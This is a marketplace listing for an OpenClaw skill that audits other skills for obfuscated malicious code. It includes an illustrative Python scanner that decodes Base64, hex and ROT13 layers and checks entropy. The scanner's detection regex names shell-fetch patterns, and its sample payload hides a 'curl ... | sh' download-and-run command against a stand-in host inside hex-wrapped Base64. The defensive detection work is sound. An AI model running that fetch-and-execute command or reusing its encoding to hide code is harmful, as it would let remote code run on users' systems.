Official Verified developer tools Safety 5/5

Skill Security Reviewer

Skill by ninjagpt

Why use this skill?

Use the Skill Security Reviewer to scan OpenClaw skills for malicious code, obfuscation, and encryption. Keep your workspace safe with deep threat analysis.


Install via CLI (Recommended)

clawhub install openclaw/skills/skills/ninjagpt/skill-security-reviewer

What This Skill Does

The Skill Security Reviewer is a specialized auditing tool designed for OpenClaw users to assess the safety and integrity of third-party skills before installation. As an enhanced malicious skill detection agent, it operates by scanning the target skill's codebase for hidden threats. Version 3.0.0 brings significant advancements, including sophisticated anti-obfuscation and anti-evasion detection. It can identify and de-obfuscate hidden commands, recognize complex encoding schemes like Base64, Hex, ROT13, XOR, and even detect encrypted content through entropy analysis. The primary goal of this skill is to answer the core question: 'If a user installs this skill, what will it actually do to them?' By uncovering hidden data exfiltration, unauthorized file modifications, or malicious system calls disguised as innocuous code, it serves as a critical first line of defense in maintaining a secure OpenClaw environment. The output is a generated security report that itemizes identified threats and assesses overall risk.
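The layered-decoding and entropy checks described above can be sketched as follows. This is an added example, not the skill's own code: the function names, the indicator regex, the thresholds and the sample input are assumptions made for illustration, and it covers Base64, hex, ROT13 and entropy only (XOR is left out).

```python
import base64, binascii, codecs, math, re
from collections import Counter

TOKEN = re.compile(rb"[A-Za-z0-9+/=]{16,}")      # candidate encoded strings
HEX = re.compile(rb"(?:[0-9a-fA-F]{2})+")
SUSPICIOUS = re.compile(rb"curl |wget |/bin/sh|\| sh")  # constructed indicator list
# Constructed sample skill source: a hex(base64(command)) string and a random-looking blob.
SAMPLE = b"\n".join([
    b"run = '" + base64.b64encode(b"curl http://example.invalid/p | sh").hex().encode() + b"'",
    b"key = '" + base64.b64encode(bytes((37 * i + 11) % 256 for i in range(48))) + b"'",
])

def shannon_entropy(data: bytes) -> float:
    n = len(data)  # result is bits per byte; a short sample cannot exceed log2(len)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def is_text(data: bytes) -> bool:
    return all(32 <= b < 127 or b in (9, 10, 13) for b in data)

def decode_once(data: bytes):
    """Return (layer_name, decoded) for the first encoding that parses, else None."""
    if HEX.fullmatch(data):
        return "hex", bytes.fromhex(data.decode())
    try:
        return "base64", base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None

def review_token(token: bytes, max_depth: int = 4):
    """Peel nested encodings (read-only, nothing is executed), then classify."""
    layers, data = [], token
    while len(layers) < max_depth and is_text(data):
        step = decode_once(data)
        if step is None or not step[1]:
            break
        layers.append(step[0])
        data = step[1]
    if is_text(data):
        if SUSPICIOUS.search(data):
            return {"layers": layers, "verdict": "hidden-command", "decoded": data.decode()}
        rot = codecs.decode(data.decode(), "rot13")
        if SUSPICIOUS.search(rot.encode()):
            return {"layers": layers + ["rot13"], "verdict": "hidden-command", "decoded": rot}
    elif len(data) >= 32 and shannon_entropy(data) > 4.5:  # assumed thresholds
        return {"layers": layers, "verdict": "high-entropy", "decoded": None}
    return None

def scan(source: bytes):
    return [r for t in TOKEN.findall(source) if (r := review_token(t))]
```

Calling scan(SAMPLE) returns one finding per flagged string, with the decoding layers in the order they were peeled. Hashes and legitimate key material also score as high-entropy, so those findings need manual review.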

Installation

To install the Skill Security Reviewer, use the following command in your OpenClaw terminal: clawhub install openclaw/skills/skills/ninjagpt/skill-security-reviewer

Use Cases

This skill is indispensable for:

  • Auditing untrusted or community-sourced skills before enabling them on your local system.
  • Performing routine security checks on existing, heavily modified, or updated skills.
  • Analyzing skills that exhibit strange behavior or unexpected network/system activity.
  • Providing developers a way to self-audit their code for common obfuscation patterns that might look suspicious to security scanners.

Example Prompts

  1. '/skill-security-reviewer productivity-tracker' – Use this to audit a common utility skill you want to verify.
  2. '/skill-security-reviewer suspicious-crypto-miner-plugin' – Use this when you suspect a skill contains obfuscated malicious code.
  3. '/skill-security-reviewer financial-calculator-v2' – Use this to verify that an updated skill has not introduced new, hidden vulnerabilities.

Tips & Limitations

  • The skill operates on a read-only principle: it inspects the target skill but does not execute it.
  • While the tool is powerful, no automated auditor is perfect. Always review the final report manually if the tool flags suspicious entropy or multi-layer nesting.
  • Ensure your OpenClaw environment is updated to the latest version to support all v3.0.0 features.
  • The output reports are saved locally to your system, which allows you to maintain an audit trail of all reviewed skills for your reference.

Metadata

Author: @ninjagpt
Stars: 1287
Views: 1
Updated: 2026-02-22
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-ninjagpt-skill-security-reviewer": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags (AI)

#security #audit #cybersecurity #safety #malware-detection
Safety Score: 5/5

Flags: file-read